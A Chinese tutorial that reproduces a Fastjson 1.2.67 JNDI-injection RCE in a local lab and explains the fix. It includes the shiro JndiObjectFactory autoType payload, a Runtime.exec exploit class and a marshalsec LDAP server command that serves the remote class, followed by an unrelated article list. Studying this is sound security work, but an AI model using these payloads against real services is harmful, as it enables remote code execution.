初識Fastjson漏洞(環境搭建及漏洞復現)

原創 合天智汇 2020-07-02 11:51

目前網上的資源整理不是針對入門玩家,都需要一定的java漏洞調試基礎,本文從一個簡單的FastJson 漏洞開始,搭建漏洞環境,分析漏洞成因,使用條件等。從入門者的角度看懂並復現漏洞觸發,擁有屬於自己的一套漏洞調試環境。

0x01 Fastjson簡介

Fastjson 是Alibaba的開源JSON解析庫,它可以解析 JSON 格式的字符串,支持將 Java Bean 序列化爲 JSON 字符串,也可以從 JSON 字符串反序列化到 JavaBean。 https://github.com/alibaba/fastjson

0x02 環境搭建

JDK 版本:8u112fastjson: 1.2.67shiro: 1.5.1slf4j-nop: 1.7.25

0x1 添加依賴包

爲了快速添加項目所需要的jar包,創建Maven項目如下

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>


    <groupId>groupId</groupId>
    <artifactId>Fastjson1.2.66_RCE</artifactId>
    <version>1.0-SNAPSHOT</version>
    <dependencies>
        <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.67</version>
        </dependency>


        <dependency>
        <groupId>org.apache.shiro</groupId>
        <artifactId>shiro-core</artifactId>
        <version>1.5.1</version>
        </dependency>


        <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-simple</artifactId>
        <version>1.7.25</version>
        <scope>test</scope>
        </dependency>


        <dependency>
            <groupId>org.slf4j</groupId>
            <artifactId>slf4j-nop</artifactId>
            <version>1.7.25</version>
        </dependency>


    </dependencies>
    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <maven.compiler.encoding>UTF-8</maven.compiler.encoding>
        <java.version>1.8</java.version>
        <maven.compiler.source>1.8</maven.compiler.source>
        <maven.compiler.target>1.8</maven.compiler.target>
    </properties>
</project>

之後右鍵pom.xml 點擊下載source和document


0x2 選擇JDK版本

該漏洞選擇JDK 8u112


0x3 編寫漏洞代碼

在main文件夾中添加漏洞代碼,核心在於調用了fastjson.JSON的parseObject 函數


import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;


public class test {
    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);


        String payload = "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\":\"ldap://127.0.0.1:1389/Exploit\"}";
        try {
            JSON.parseObject(payload);
        } catch (Exception e) {
            e.printStackTrace();
        }


    }
}

0x03 漏洞原理

0x1 FastJson 類解析

Fastjson接口簡單易用,廣泛使用在緩存序列化、協議交互、Web輸出、Android客戶端提供兩個主要接口toJsonString和parseObject來分別實現序列化和反序列化。

FastJson中的 parse() 和 parseObject()方法都可以用來將JSON字符串反序列化成Java對象,parseObject() 本質上也是調用 parse() 進行反序列化的。但是 parseObject() 會額外的將Java對象轉爲 JSONObject對象,即 JSON.toJSON()。所以進行反序列化時的細節區別在於,parse() 會識別並調用目標類的 setter 方法及某些特定條件的 getter 方法,而 parseObject() 由於多執行了 JSON.toJSON(obj),所以在處理過程中會調用反序列化目標類的所有 setter 和 getter 方法。

fastjson.java

package com.teddy.fastjson;


import com.alibaba.fastjson.JSON;
import java.io.IOException;


public class fastjson {


    public String name;
    public String age;
    public fastjson() throws IOException {
    }


    public void setName(String test) {
        System.out.println("name setter called");
        this.name = test;
    }


    public String getName() {
        System.out.println("name getter called");
        return this.name;
    }


    public void setAge(String test) {
        System.out.println("age setter called");
        this.age = test;
    }
    public String getAge(){
        System.out.println("age getter called");
        return this.age;
    }


    public static void main(String[] args) {
        Object obj = JSON.parse("{\"@type\":\"com.teddy.fastjson.fastjson\",\"name\":\"test name\", \"age\":\"test age\"}");
        System.out.println(obj);
        System.out.println("------------");
        Object obj2 = JSON.parseObject("{\"@type\":\"com.teddy.fastjson.fastjson\",\"name\":\"test name\", \"age\":\"test age\"}");
        System.out.println(obj2);
    }


}

result

name setter called
age setter called
com.teddy.fastjson.fastjson@66480dd7
------------
name setter called
age setter called
age getter called
name getter called
{"name":"thisisname","age":"thisisage"}


由結果可以看出調用parseObject 函數會調用getattr方法。

0x2 漏洞調用鏈分析

調用棧分析

1. parseObject 對象類型轉換

這一步的操作是將obj對應的對象類型轉化爲json格式,這勢必要方位getattr 對象方法,從而觸發漏洞。

2. 反射調用

通過invoke方法,調用getinstance方法

3. 觸發ldap

在JndiObjectFactory getinstance 中調用了this.lookup(resourceName)

0x3 JNDI 注入

Java Name Directory Interface,Java命名和目錄接口(JNDI)是一種Java API,類似於一個索引中心,它允許客戶端通過name發現和查找數據和對象。JNDI包括Naming Service和Directory Service,通過名稱來尋找數據和對象的API,也稱爲一種綁定。JNDI可訪問的現有的目錄及服務有:JDBC、LDAP、RMI、DNS、NIS、CORBA。

其應用場景比如:動態加載數據庫配置文件,從而保持數據庫代碼不變動等。

注入方法:

  1. JNDI Reference 配合 RMI

  2. JNDI Reference 配合 LDAP

RMI格式:ctx.lookup("rmi://localhost:9999/refObj");LDAP格式ctx.lookup("ldap://localhost:9999/refObj");

若lookup函數中的參數攻擊者可控,便可以指向攻擊者的服務器,即可實現JNDI注入實現任意代碼執行。

1 RMI

RMI(Remote Method Invocation,遠程方法調用)。遠程方法調用是分佈式編程中的一個基本思想,實現遠程方法調用的技術有CORBA、WebService等(這兩種獨立於編程語言)。RMI則是專門爲JAVA設計,依賴JRMP通訊協議。

2 LDAP

LDAP(Lightweight Directory Access Protocol ,輕型目錄訪問協議)是一種目錄服務協議,運行在TCP/IP堆棧之上。目錄服務是一個特殊的數據庫,用來保存描述性的、基於屬性的詳細信息,能進行查詢、瀏覽和搜索,以樹狀結構組織數據。LDAP以樹結構標識所以不能像表格一樣用SQL語句查詢,它“讀”性能很強,但“寫”性能較差,並且沒有事務處理、回滾等複雜功能,不適於存儲修改頻繁的數據。LDAP目錄和RMI註冊表的區別在於是前者是目錄服務,並允許分配存儲對象的屬性。

該漏洞簡單的將利用org.apache.shiro 包中的jndi功能訪問自己搭建的ldap服務,獲取並執行自己編譯的Exploit.class文件。

0x04 漏洞利用

0x1 編譯Java 利用代碼

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.Reader;
import javax.print.attribute.standard.PrinterMessageFromOperator;
public class ExecTest {
    public ExecTest() throws IOException,InterruptedException{
        String cmd="/Applications/Calculator.app/Contents/MacOS/Calculator";
        final Process process = Runtime.getRuntime().exec(cmd);
        printMessage(process.getInputStream());;
        printMessage(process.getErrorStream());
        int value=process.waitFor();
        System.out.println(value);
    }


    private static void printMessage(final InputStream input) {
        // TODO Auto-generated method stub
        new Thread (new Runnable() {
            @Override
            public void run() {
                // TODO Auto-generated method stub
                Reader reader =new InputStreamReader(input);
                BufferedReader bf = new BufferedReader(reader);
                String line = null;
                try {
                    while ((line=bf.readLine())!=null)
                    {
                        System.out.println(line);
                    }
                }catch (IOException  e){
                    e.printStackTrace();
                }
            }
        }).start();
    }
}


命令行編譯class文件

/Library/Java/JavaVirtualMachines/jdk1.8.0_112.jdk/Contents/Home/bin/javac Exploit.java



0x2 開啓 LDAP 服務

使用marshalsec啓動一個ladp服務器 ,下載地址爲https://github.com/mbechler/marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8089/#Exploit


0x3 開啓HTTP Web 服務

將編譯好的Exploit.class 放在web目錄下並開啓服務

0x05 漏洞補丁

這個鏈接梳理了fastjson hash對應的jar,可以方便的尋找已經被過濾的jar包https://github.com/LeadroyaL/fastjson-blacklist

該漏洞採用黑名單的方式進行修補,在1.2.68中把org.apache.shiro.jndi 給ban掉了

對應的具體代碼如下圖所示,在   public Class<?> checkAutoType(String typeName, Class<?> expectClass, int features) 函數中有對應處理

黑名單hash生成算法,大概思路是將每一位都異或進行異或疊加。

if ((!internalWhite) && (autoTypeSupport || expectClassFlag)) {
            long hash = h3;
            for (int i = 3; i < className.length(); ++i) {
                hash ^= className.charAt(i);
                hash *= PRIME;
                if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) {
                    clazz = TypeUtils.loadClass(typeName, defaultClassLoader, true);
                    if (clazz != null) {
                        return clazz;
                    }
                }
                if (Arrays.binarySearch(denyHashCodes, hash) >= 0 && TypeUtils.getClassFromMapping(typeName) == null) {
                    if (Arrays.binarySearch(acceptHashCodes, fullHash) >= 0) {
                        continue;
                    }
                    throw new JSONException("autoType is not support. " + typeName);
                }
            }
        }


0x06 參考鏈接

本文項目鏈接 https://github.com/ctlyz123/fastjson_vul


https://www.jianshu.com/p/776c56fc3a80


https://github.com/LeadroyaL/fastjson-blacklist


http://xxlegend.com/2018/10/23/%E5%9F%BA%E4%BA%8EJdbcRowSetImpl%E7%9A%84Fastjson%20RCE%20PoC%E6%9E%84%E9%80%A0%E4%B8%8E%E5%88%86%E6%9E%90/


https://www.freebuf.com/column/189835.html


https://cloud.tencent.com/developer/article/1601977


https://paper.seebug.org/994/#0x01-fastjson

Java反序列漏洞

https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182015111916202700001

歡迎投稿至郵箱:[email protected]

有才能的你快來投稿吧!

投稿細則都在裏面了,點擊查看哦

重金懸賞 | 合天原創投稿漲稿費啦!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Qt/C++音視頻開發72-倍速推流/音視頻同步倍速推流/不改變幀率和採樣率/低倍速和高倍速

一、前言 最近多了個新需求,需要倍速推流,推流界的扛把子obs也有倍速推流功能,最高支持到兩倍速。這裏所說的倍速,當然只限定在文件,只有文件纔可能有倍速功能,因爲也只有文件才能倍速解碼播放。實時視頻流是不可能倍速的,因爲沒有時長,有時長的纔

飛揚青雲 2024-05-05 14:31:43

IDEA 選擇 Maven profile 後不生效

參考:Idea select maven profile sometimes not working 發現切換 profile 後沒有生效。 可以進入運行配置,在 Before launch 中加入 compile 目標。

Higurashi-kagome 2024-05-05 14:27:42

win11關閉自動檢測病毒刪文件

關閉掉保護即可. 有時候莊遊戲, 總是被系統當病毒刪了.

張博的博客 2024-05-05 14:19:42

編程方法學

編程語言Rank https://www.tiobe.com/tiobe-index/ 雷軍代碼:(彙編語言Assembly Language/.ass) https://cloud.tencent.com/developer/art

Qtodd 2024-05-05 14:13:31

.Net 8.0 下的新RPC,IceRPC之如何創建連接connection

作者引言 很高興啊,我們來到了IceRPC之如何創建連接connection,基礎引導,讓自已不在迷茫,快樂的暢遊世界。 如何創建連接connection 學習如何使用IceRPC,創建和接受連接。 連接有什麼用途? 連接在 Ice

xlgwr 2024-05-05 13:54:30

.NET 8 的openEuler 容器鏡像

目前.NET 8的容器鏡像已經支持openEuler,以openEuler爲基礎鏡像的應用鏡像:dotnet-deps、dotnet-runtime 和 dotnet-aspnet。基礎鏡像簡介這裏存放着由openEuler官方提供的容器鏡

張善友 2024-05-05 13:52:30

讓.NET 8 支持 Windows Vista RTM

衆所周知,從 Windows 的每次更新又會新增大量 API,這使得兼容不同版本的 Windows 需要花費很大精力。導致現在大量開源項目已經不再兼容一些早期的 Windows 版本,比如 .NET 8 AOT編譯命令行程序時生成的EXE,

張善友 2024-05-05 13:52:29

千兆寬帶實際網速能到達多少?

背景 在生活中,經常會遇到這樣的問題,我們申請的帶寬是1000M,但實際下載的最高速度只有125MB(1000Mb / 8 = 125MB) 有的人就會問,爲什麼下載速度這麼慢?爲什麼要除以8呢? 對於這個問題,首先要知道,帶寬和網速,他們

翎野 2024-05-05 13:49:29

剝開網線表皮,裏面的8根線分別代表什麼以及作用

 網線是現代網絡通信的核心組成部分,其八根線的作用各有不同。首先,網線由八根細線組成,每根細線都有其特定的功能和作用。 第一根細線: 負責發送數據信號。在計算機網絡通信中,數據的傳輸需要依靠信號來進行。因此,第一根細線的作用就是

翎野 2024-05-05 13:49:29

「 網絡安全術語解讀 」通用平臺枚舉CPE詳解

https://blog.csdn.net/u013129300/article/details/129329786

規格嚴格-功夫到家 2024-05-05 13:43:19

深入學習和理解Django視圖層:處理請求與響應

title: 深入學習和理解Django視圖層:處理請求與響應 date: 2024/5/4 17:47:55 updated: 2024/5/4 17:47:55 categories: 後端開發 tags: Django 請求處

Mifen 2024-05-05 13:38:28

成都 VS 深圳

日常 成都:好多老頭老太太 深圳:咋這個多年輕人 成都:早上公園一堆堆的打太極 深圳:早上公園一堆堆跳廣場舞 成都:一到冬天,天天霧霾 深圳:一年四季碧水藍天 成都:沒有山,山都在西邊去了 深圳:大山小山不少,有山或水必有公園。週末沒事爬爬

hua1989 2024-05-05 13:38:18

如何閱讀 Paper

前言 論文(Paper)通常是新技術、算法、編程方法或軟件工具的首次公佈。通過閱讀論文,我們可以瞭解最新的技術進展,保持自己的技能和知識是最新的。 同時,論文提供了對特定主題深入理解的機會。它們通常包含詳細的理論分析和實驗結果,這有助於深入

mghio 2024-05-05 13:32:48

REACT: SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS

發表時間:2023(ICLR 2023) 文章要點:文章提出一個簡單有效的ReAct框架,將reasoning和action結合,在交互式的環境上進行測試,取得了很好的效果。其中reasoning作爲推理模塊,幫助模型歸納,跟蹤和更新動作規

initial_h 2024-05-05 13:32:27

sysbench的部分基準性能測試學習

sysbench的部分基準性能測試學習 命令 Compiled-in tests: fileio - File I/O test cpu - CPU performance test memory - Memory funct

濟南小老虎 2024-05-05 13:29:27